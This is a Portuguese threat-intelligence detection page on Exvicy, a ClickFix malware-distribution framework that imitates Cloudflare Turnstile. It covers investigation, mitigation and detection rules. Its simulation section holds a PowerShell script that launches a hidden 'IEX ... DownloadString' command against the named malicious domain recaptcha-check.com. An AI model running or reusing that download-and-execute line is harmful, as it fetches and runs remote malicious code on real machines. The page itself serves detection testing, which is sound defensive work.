Exvicy: Um plágio do quadro de distribuição de malware ErrTraffic
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Exvicy é um framework emergente de distribuição de Malware como Serviço (MaaS) ClickFix promovido em fóruns de cibercrime. Ele utiliza engenharia social ao imitar desafios do Cloudflare Turnstile para convencer os usuários a executar comandos maliciosos do PowerShell através do diálogo Executar do Windows. O framework copia de perto o ErrTraffic, reutilizando grandes partes de sua base de código JavaScript e técnicas de ofuscação.
Investigação
Analistas de TDR fizeram pivot a partir de uma captura de tela de um painel de administração compartilhado no fórum Exploit.IN para descobrir infraestrutura de C2 ativa. Ao analisar servidores de nomes Cloudflare específicos e padrões de registro de domínio, os pesquisadores identificaram vários domínios maliciosos e sites WordPress comprometidos. A análise técnica confirmou o extenso reaproveitamento do código ErrTraffic, incluindo funções JavaScript distintas e lógica anti-análise.
Mitigação
As organizações devem implantar filtragem web robusta para bloquear domínios maliciosos conhecidos e TLDs suspeitos associados a essas campanhas. A proteção de endpoint deve monitorar e restringir execução anômala do PowerShell, especialmente comandos envolvendo irm or iex. Os usuários também devem ser treinados para reconhecer prompts de engenharia social que os instruem a usar atalhos de teclado como Win+R para executar comandos.
Resposta
Se a atividade do Exvicy for detectada, os hosts afetados devem ser isolados imediatamente para impedir execução adicional de comandos ou entrega de carga útil. Os respondedores devem revisar os logs operacionais do PowerShell para identificar comandos executados e conexões de rede relacionadas. Endereços IP e domínios de C2 conhecidos devem ser bloqueados no perímetro, seguido de uma varredura por outros ativos WordPress comprometidos no ambiente.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Comando e Controle Suspeito por Pedido DNS de Domínio de Nível Superior (TLD) Incomum (via dns)
Entrada RunMRU Suspeita com Semântica LOLBin (via registry_event)
IOCs (SourceIP) para detectar: Exvicy: Uma cópia do framework de distribuição de malware ErrTraffic
IOCs (DestinationIP) para detectar: Exvicy: Uma cópia do framework de distribuição de malware ErrTraffic
Detecção de Execução de Comando Malicioso do PowerShell para Malware Exvicy [Windows PowerShell]
Execução de Comando do Framework Exvicy via Atalho Win + R [Criação de Processo do Windows]
Execução de Simulação
-
Narrativa & Comandos do Ataque: Um adversário entrega um atalho ou documento malicioso a um usuário via phishing. Ao executar (T1204.002), o usuário inadvertidamente aciona um processo PowerShell (T1059.001). O objetivo do atacante é estabelecer um ponto de apoio ao baixar uma carga secundária. Para imitar o framework Exvicy, a linha de comando é elaborada para incluir o domínio específico e conhecido como malicioso
recaptcha-check.com/8E9curHNH8UfAMLzpara baixar o agente malicioso. -
Script de Teste de Regressão:
# Script de simulação para acionar a regra de detecção do Exvicy. # Isso imita os padrões das linhas de comando identificados na regra Sigma. $urlMalicioso = "http://recaptcha-check.com/8E9curHNH8UfAMLz" $comando = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$urlMalicioso')`"" Write-Host "[+] Iniciando Simulação: Executando comando para acionar detecção..." Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$comando`"" Write-Host "[+] Comando de simulação enviado. Verifique alertas no SIEM." -
Comandos de Limpeza:
# Limpeza: Não são criados arquivos permanentes nesta simulação específica, # mas garantimos que não haja processos do PowerShell em execução. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue Write-Host "[+] Limpeza completa."